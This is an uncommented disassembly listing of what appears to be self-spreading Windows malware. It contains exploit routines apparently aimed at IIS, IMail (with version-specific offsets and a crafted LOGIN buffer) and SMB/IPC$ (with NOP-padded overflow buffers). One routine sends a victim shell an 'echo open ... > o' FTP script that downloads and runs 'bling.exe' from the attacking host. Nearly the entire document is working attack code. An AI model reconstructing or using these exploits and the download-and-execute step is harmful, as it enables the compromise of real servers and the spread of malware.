call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40CE5F
loc_40CE5C: ; CODE XREF: .text:0040CE71�j
push esi
jmp short loc_40CEB8
; ---------------------------------------------------------------------------
loc_40CE5F: ; CODE XREF: .text:0040CE5A�j
push ebx
push 48h
push offset dword_43E100
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40CE5C
push ebx
mov esi, 1000h
push esi
lea eax, [ebp-1138h]
push eax
push edi
call dword_444064 ; recv
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40CEA0
push dword ptr [ebp-8]
jmp short loc_40CEB8
; ---------------------------------------------------------------------------
loc_40CEA0: ; CODE XREF: .text:0040CE99�j
push ebx
push esi
lea eax, [ebp-1138h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_40CEC9
loc_40CEB8: ; CODE XREF: .text:0040CE5D�j
; .text:0040CE9E�j
call _free
pop ecx
push edi
loc_40CEBF: ; CODE XREF: .text:0040CE45�j
call dword_444218 ; closesocket
loc_40CEC5: ; CODE XREF: .text:0040CC78�j
; .text:0040CCC7�j ...
xor eax, eax
jmp short loc_40CF19
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: .text:0040CEB6�j
call _free
pop ecx
push edi
call dword_444218 ; closesocket
loc_40CED6: ; CODE XREF: .text:0040CDAA�j
push 1F4h
call ds:dword_42B014 ; Sleep
push 7C7h
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz short loc_40CF16
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
loc_40CF16: ; CODE XREF: .text:0040CF03�j
xor eax, eax
inc eax
loc_40CF19: ; CODE XREF: .text:0040CEC7�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
mov esi, 160h
push esi
mov dword ptr [ebp-4], 6741A1CDh
call _malloc
push esi
mov edi, eax
push 0
push edi
call _memset
push 12h
push offset dword_43E780
push edi
call _memcpy
lea esi, [edi+11h]
push offset dword_432FB8
push esi
call _strcat
push offset aThcownziis ; "THCOWNZIIS!"
push esi
call _strcat
not dword ptr [ebp-4]
push 4
lea eax, [ebp-4]
push eax
push esi
call _strncat
xor eax, eax
mov ax, word ptr dword_4D525C
add esp, 38h
push eax
call dword_444260 ; htons
push dword ptr [ebp+8]
mov [ebp-8], eax
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
xor dword ptr [ebp-8], 9393h
mov [ebp-0Ch], eax
xor dword ptr [ebp-0Ch], 93939393h
push 2
lea eax, [ebp-8]
push eax
push offset word_43E79A
call _memcpy
push 4
lea eax, [ebp-0Ch]
push eax
push offset dword_43E79C
call _memcpy
push offset byte_43E798
push esi
call _strcat
add esp, 20h
push 6
push 1
push 2
call dword_444100 ; socket
mov esi, eax
lea eax, [ebp+0Ch]
push eax
call dword_44417C ; inet_addr
push 1BBh
mov [ebp-18h], eax
mov word ptr [ebp-1Ch], 2
call dword_444260 ; htons
mov [ebp-1Ah], ax
push 10h
lea eax, [ebp-1Ch]
push eax
push esi
call dword_4440AC ; connect
test eax, eax
jnz short loc_40D04F
push eax
push 15Fh
push edi
push esi
call dword_4441A0 ; send
push esi
call dword_444218 ; closesocket
push edi
call _free
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp short loc_40D051
; ---------------------------------------------------------------------------
loc_40D04F: ; CODE XREF: .text:0040D01B�j
xor eax, eax
loc_40D051: ; CODE XREF: .text:0040D04D�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D055 proc near ; CODE XREF: .text:0040D728�p
var_800 = byte ptr -800h
Dest = byte ptr -400h
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 800h
push esi
push edi
mov edi, [ebp+arg_BC]
push 0
mov esi, 400h
push esi
lea eax, [ebp+var_800]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz loc_40D128
movzx eax, word ptr dword_4D1FE4
push eax
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40D128
push 1F4h
call ds:dword_42B014 ; Sleep
push offset aBling_exe ; "bling.exe\r\n"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40D128
push 0
push esi
push offset dword_4D4BB0
push edi
call dword_444064 ; recv
push edi
call dword_444218 ; closesocket
loc_40D128: ; CODE XREF: sub_40D055+2A�j
; sub_40D055+78�j ...
pop edi
pop esi
leave
retn
sub_40D055 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
push edi
mov dword ptr [ebp-14h], 10h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
lea eax, [ebp+0Ch]
push eax
mov edi, edx
add edi, 7D0h
mov [ebp-20h], edi
call dword_444168 ; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_40D17F
lea eax, [ebp+0Ch]
push eax
call ds:dword_42B218 ; inet_addr
cmp eax, 0FFFFFFFFh
mov dword_4D4CC0, eax
jz loc_40D757
loc_40D17F: ; CODE XREF: .text:0040D165�j
push 6
push 1
push 2
pop ebx
push ebx
call dword_444100 ; socket
test eax, eax
mov dword_4D4CBC, eax
jz loc_40D757
test esi, esi
jz short loc_40D1B6
movsx eax, word ptr [esi+0Ah]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp-0Ch]
push eax
call _memcpy
add esp, 0Ch
jmp short loc_40D1BE
; ---------------------------------------------------------------------------
loc_40D1B6: ; CODE XREF: .text:0040D19C�j
mov eax, dword_4D4CC0
mov [ebp-0Ch], eax
loc_40D1BE: ; CODE XREF: .text:0040D1B4�j
test esi, esi
jz short loc_40D1CC
mov ax, [esi+8]
mov [ebp-10h], ax
jmp short loc_40D1D0
; ---------------------------------------------------------------------------
loc_40D1CC: ; CODE XREF: .text:0040D1C0�j
mov [ebp-10h], bx
loc_40D1D0: ; CODE XREF: .text:0040D1CA�j
push dword ptr [ebp+0A8h]
call dword_444260 ; htons
push dword ptr [ebp+8]
mov [ebp-0Eh], ax
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
push edi
mov esi, eax
call dword_444260 ; htons
movzx eax, ax
xor eax, 7C1Fh
mov [ebp-1Ch], eax
push 4
lea eax, [ebp-18h]
push eax
xor esi, 7C1F1AE0h
push offset dword_43E9A0
mov [ebp-18h], esi
call _memcpy
push ebx
lea eax, [ebp-1Ch]
push eax
push offset word_43E9A6
call _memcpy
push 386h
push 90h
mov edi, offset dword_4D4CC8
push edi
call _memset
push 0Ch
push offset aA01Login ; "a01 LOGIN \"&"
push edi
call _memcpy
push 138h
push offset dword_43E8E8
push offset dword_4D4D74
call _memcpy
push 2Ah
push offset dword_43EAC0
push offset dword_4D4F94
call _memcpy
add esp, 48h
push 0Bh
push offset aWe0wn ; "\" \"We0wn\"\r\n"
push offset word_4D504E
call _memcpy
add esp, 0Ch
push 10h
lea eax, [ebp-10h]
push eax
push dword_4D4CBC
call dword_4440AC ; connect
test eax, eax
mov dword_4D4CB8, eax
jnz loc_40D757
push eax
push 100h
mov esi, offset dword_4D4BB0
push esi
push dword_4D4CBC
call dword_444064 ; recv
push offset aImail ; "IMail"
push esi
mov dword_4D4CB0, eax
call _strstr
test eax, eax
pop ecx
pop ecx
jz loc_40D7DE
push offset a7_04 ; "7.04"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D30D
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA28
loc_40D303: ; CODE XREF: .text:0040D335�j
; .text:0040D370�j ...
push offset dword_4D4F84
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D30D: ; CODE XREF: .text:0040D2EA�j
push offset a7_05 ; "7.05"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D337
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA30
jmp short loc_40D303
; ---------------------------------------------------------------------------
loc_40D337: ; CODE XREF: .text:0040D31C�j
push offset a7_06 ; "7.06"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D359
push offset a7_07 ; "7.07"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D372
loc_40D359: ; CODE XREF: .text:0040D346�j
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA38
jmp short loc_40D303
; ---------------------------------------------------------------------------
loc_40D372: ; CODE XREF: .text:0040D357�j
push offset a7_10 ; "7.10"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D394
push offset a7_11 ; "7.11"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D3B0
loc_40D394: ; CODE XREF: .text:0040D381�j
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA40
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D3B0: ; CODE XREF: .text:0040D392�j
push offset a7_12 ; "7.12"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D3DD
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA48
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D3DD: ; CODE XREF: .text:0040D3BF�j
push offset a7_13 ; "7.13"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D3FF
push offset a7_14 ; "7.14"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D41B
loc_40D3FF: ; CODE XREF: .text:0040D3EC�j
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA50
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D41B: ; CODE XREF: .text:0040D3FD�j
push offset a7_15 ; "7.15"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D448
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA58
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D448: ; CODE XREF: .text:0040D42A�j
push offset a8_00 ; "8.00"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D475
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA60
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D475: ; CODE XREF: .text:0040D457�j
push offset a8_01 ; "8.01"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D4A2
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA68
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D4A2: ; CODE XREF: .text:0040D484�j
push offset a8_02 ; "8.02"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D4CF
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA70
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D4CF: ; CODE XREF: .text:0040D4B1�j
push offset a8_03 ; "8.03"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D4FC
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA78
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D4FC: ; CODE XREF: .text:0040D4DE�j
push offset a8_04 ; "8.04"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D529
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA80
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D529: ; CODE XREF: .text:0040D50B�j
push offset a8_05 ; "8.05"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D556
push ebx
push offset dword_43EA24
push offset word_4D4F82
call _memcpy
push 4
push offset dword_43EA88
jmp loc_40D303
; ---------------------------------------------------------------------------
loc_40D556: ; CODE XREF: .text:0040D538�j
push offset a8_10 ; "8.10"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D583
push ebx
push offset dword_43EA24
push offset word_4D4F7A
call _memcpy
push 4
push offset dword_43EA90
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D583: ; CODE XREF: .text:0040D565�j
push offset a8_11 ; "8.11"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D5B0
push ebx
push offset dword_43EA24
push offset word_4D4F7A
call _memcpy
push 4
push offset dword_43EA98
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D5B0: ; CODE XREF: .text:0040D592�j
push offset a8_12 ; "8.12"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D5DA
push ebx
push offset dword_43EA24
push offset word_4D4F7A
call _memcpy
push 4
push offset dword_43EAA0
jmp short loc_40D630
; ---------------------------------------------------------------------------
loc_40D5DA: ; CODE XREF: .text:0040D5BF�j
push offset a8_13 ; "8.13"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D604
push ebx
push offset dword_43EA24
push offset word_4D4F7A
call _memcpy
push 4
push offset dword_43EAA8
jmp short loc_40D630
; ---------------------------------------------------------------------------
loc_40D604: ; CODE XREF: .text:0040D5E9�j
push offset a8_14 ; "8.14"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz loc_40D75E
push ebx
push offset dword_43EA24
push offset word_4D4F7A
call _memcpy
push 4
push offset dword_43EAB0
loc_40D630: ; CODE XREF: .text:0040D57E�j
; .text:0040D5AB�j ...
push offset dword_4D4F7C
loc_40D635: ; CODE XREF: .text:0040D308�j
call _memcpy
add esp, 18h
loc_40D63D: ; CODE XREF: .text:0040D7ED�j
mov esi, ds:dword_42B014
push 64h
call esi ; Sleep
push 0
push edi
call _strlen
pop ecx
push eax
push edi
push dword_4D4CBC
call dword_4441A0 ; send
push 64h
call esi ; Sleep
push dword ptr [ebp-20h]
xor edi, edi
mov [ebp-0Ch], edi
call dword_444260 ; htons
push 6
xor esi, esi
inc esi
push esi
push ebx
mov [ebp-0Eh], ax
call dword_444100 ; socket
push 10h
lea ecx, [ebp-10h]
push ecx
push eax
mov dword_4D4CB4, eax
call dword_4441E4 ; bind
cmp eax, edi
mov dword_4D4CB8, eax
jnz loc_40D757
push esi
push dword_4D4CB4
call dword_444230 ; listen
cmp eax, edi
mov dword_4D4CB8, eax
jnz loc_40D757
mov eax, dword_4D4CB4
mov [ebp-128h], eax
lea eax, [ebp-28h]
push eax
push edi
push edi
lea eax, [ebp-12Ch]
push eax
push esi
mov dword ptr [ebp-28h], 8
mov [ebp-24h], edi
mov [ebp-12Ch], esi
call ds:dword_42B21C ; select
test eax, eax
jle short loc_40D757
lea eax, [ebp-14h]
push eax
lea eax, [ebp-10h]
push eax
push dword_4D4CB4
call dword_4440BC ; accept
mov ecx, [ebp+0B0h]
shl ecx, 6
push eax
lea ecx, dword_43D880[ecx]
inc dword ptr [ecx]
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
mov dword_4D50C8, eax
rep movsd
call sub_40D055
add esp, 0C0h
push dword_4D4CBC
call dword_444218 ; closesocket
push dword_4D4CB4
call dword_444218 ; closesocket
push dword_4D50C8
loc_40D751: ; CODE XREF: .text:0040D7F9�j
call dword_444218 ; closesocket
loc_40D757: ; CODE XREF: .text:0040D179�j
; .text:0040D194�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: .text:0040D613�j
push offset a8_15 ; "8.15"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40D78B
push ebx
push offset dword_43EA24
push offset word_4D4F7A
call _memcpy
push 4
push offset dword_43EAB8
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D78B: ; CODE XREF: .text:0040D76D�j
push offset aHotfix2 ; "hotfix2"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a4_0 ; "4.0"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a5_0 ; "5.0"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a6_0 ; "6.0"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_40D7F3
push offset a7_0 ; "7.0"
push esi
call _strstr
pop ecx
pop ecx
jmp short loc_40D7F3
; ---------------------------------------------------------------------------
loc_40D7DE: ; CODE XREF: .text:0040D2D5�j
push offset aImail ; "IMail"
push esi
call _strstr
test eax, eax
pop ecx
pop ecx
jnz loc_40D63D
loc_40D7F3: ; CODE XREF: .text:0040D79A�j
; .text:0040D7AB�j ...
push dword_4D4CBC
jmp loc_40D751
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7FE proc near ; CODE XREF: .text:0040DD59�p
; .text:0040DD7B�p ...
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
Dst = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
Src = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
Str = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call __alloca_probe
mov eax, ds:dword_43310C
push ebx
mov [ebp+var_10], eax
mov eax, ds:dword_433110
push esi
mov [ebp+var_C], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; Dest
call _sprintf
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_40D837: ; CODE XREF: sub_40D7FE+4F�j
mov cl, [ebp+eax+Str]
mov [ebp+eax*2+Src], cl
mov [ebp+eax*2+var_103], bl
inc eax
cmp eax, 28h
jl short loc_40D837
push 60h ; Size
lea eax, [ebp+var_B4]
push offset dword_43EFF0 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_84]
push eax ; Dst
call _memcpy
add esp, 1Ch
push 9 ; Size
lea eax, [ebp+Str]
push (offset aC_4+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
push 1 ; Size
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_B1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
mov [ebp+var_2], al
push 1 ; Size
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_87]
push eax ; Dst
call _memcpy
xor eax, eax
mov ax, word ptr dword_43F3F8
add esp, 2Ch
push eax
call dword_444260 ; htons
push 2 ; Size
xor eax, 9999h
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax ; Src
push offset dword_43ECE8 ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_40D9FE
mov edi, 0DACh
push edi ; Size
lea eax, [ebp+Dst]
push 90h ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_C0]
imul eax, 3Ch
lea eax, dword_43F438[eax]
push 4 ; Size
push eax ; Src
mov [ebp+var_14], eax
lea eax, [ebp+var_14E0]
push eax ; Dst
call _memcpy
mov esi, offset aI_1 ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14D0]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_11AC]
push offset dword_4330F8 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
push [ebp+var_14] ; Src
lea eax, [ebp+var_11A8]
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_119C]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor eax, eax
loc_40D9B0: ; CODE XREF: sub_40D7FE+1CA�j
mov cl, [ebp+eax+Dst]
mov [ebp+eax*2+var_4804], cl
mov [ebp+eax*2+var_4803], bl
inc eax
cmp eax, edi
jl short loc_40D9B0
mov esi, 1C52h
push esi ; Size
lea eax, [ebp+var_89B4]
push 31h ; Val
push eax ; Dst
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call _memset
push esi ; Size
lea eax, [ebp+var_68DC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
jmp short loc_40DA55
; ---------------------------------------------------------------------------
loc_40D9FE: ; CODE XREF: sub_40D7FE+11B�j
push 7D0h ; Size
lea eax, [ebp+var_F14]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset aI_1 ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E74]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_10]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea eax, [ebp+var_758]
push eax ; Dst
call _memcpy
mov eax, dword_43F438
add esp, 2Ch
mov [ebp+var_768], eax
loc_40DA55: ; CODE XREF: sub_40D7FE+1FE�j
push 0E29h ; Size
lea eax, [ebp+var_2CA8]
push 31h ; Val
push eax ; Dst
call _memset
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
push ebx
add eax, 4
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40DA94
loc_40DA8D: ; CODE XREF: sub_40D7FE+2BD�j
; sub_40D7FE+2E4�j ...
xor al, al
jmp loc_40DC42
; ---------------------------------------------------------------------------
loc_40DA94: ; CODE XREF: sub_40D7FE+28D�j
push ebx
mov esi, 640h
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_444064 ; recv
push ebx
push 68h
push offset dword_43F058
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DA8D
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_444064 ; recv
push ebx
push 0A0h
push offset dword_43F0C8
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DA8D
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_444064 ; recv
cmp [ebp+arg_C0], ebx
jz loc_40DBAA
push 68h ; Size
lea eax, [ebp+var_89B4]
push offset dword_43F288 ; Src
push eax ; Dst
call _memcpy
push 1B5Ah ; Size
lea eax, [ebp+var_4804]
push eax ; Src
lea eax, [ebp+var_894C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68DC]
push offset dword_43F2F8 ; Src
push eax ; Dst
call _memcpy
push 0A5Eh ; Size
lea eax, [ebp+var_3770]
push eax ; Src
lea eax, [ebp+var_686C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DA8]
push offset dword_43F370 ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
push ebx
push 10FCh
lea eax, [ebp+var_89B4]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40DA8D
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_444064 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_40DC00
; ---------------------------------------------------------------------------
loc_40DBAA: ; CODE XREF: sub_40D7FE+2FC�j
push 7Ch ; Size
lea eax, [ebp+var_2CA8]
push offset dword_43F170 ; Src
push eax ; Dst
call _memcpy
push 7D0h ; Size
lea eax, [ebp+var_F14]
push eax ; Src
lea eax, [ebp+var_2C2C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_245C]
push offset off_43F1F0 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
push ebx
mov [ebp+var_1FB1], bl
push 0CF8h
lea eax, [ebp+var_2CA8]
loc_40DC00: ; CODE XREF: sub_40D7FE+3AA�j
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40DA8D
push 12Ch
call ds:dword_42B014 ; Sleep
push dword_43F3F8
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
test al, al
setnz al
loc_40DC42: ; CODE XREF: sub_40D7FE+291�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D7FE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 654h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-14h], 2
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_444260 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40DD40
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40DD40
push edi
push 89h
push offset dword_43EDD0
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DD40
push edi
mov esi, 640h
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_444064 ; recv
push edi
push 0A8h
push offset dword_43EE60
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DD40
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_444064 ; recv
push edi
push 0DEh
push offset dword_43EF10
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40DD40
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_444064 ; recv
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40DD68
dec eax
jz short loc_40DD47
loc_40DD40: ; CODE XREF: .text:0040DC9B�j
; .text:0040DCB1�j ...
xor eax, eax
jmp loc_40DDD4
; ---------------------------------------------------------------------------
loc_40DD47: ; CODE XREF: .text:0040DD3E�j
push edi
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40D7FE
add esp, 0C4h
push 0
jmp short loc_40DD8C
; ---------------------------------------------------------------------------
loc_40DD68: ; CODE XREF: .text:0040DD3B�j
push 2
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40D7FE
add esp, 0C4h
test al, al
jnz short loc_40DDAC
push 1
loc_40DD8C: ; CODE XREF: .text:0040DD66�j
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40D7FE
add esp, 0C4h
test al, al
jz short loc_40DDB3
loc_40DDAC: ; CODE XREF: .text:0040DD88�j
mov dword ptr [ebp-4], 1
loc_40DDB3: ; CODE XREF: .text:0040DDAA�j
push ebx
call dword_444218 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_40DDD1
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
loc_40DDD1: ; CODE XREF: .text:0040DDBE�j
xor eax, eax
inc eax
loc_40DDD4: ; CODE XREF: .text:0040DD42�j
pop edi
pop esi
pop ebx
leave
retn
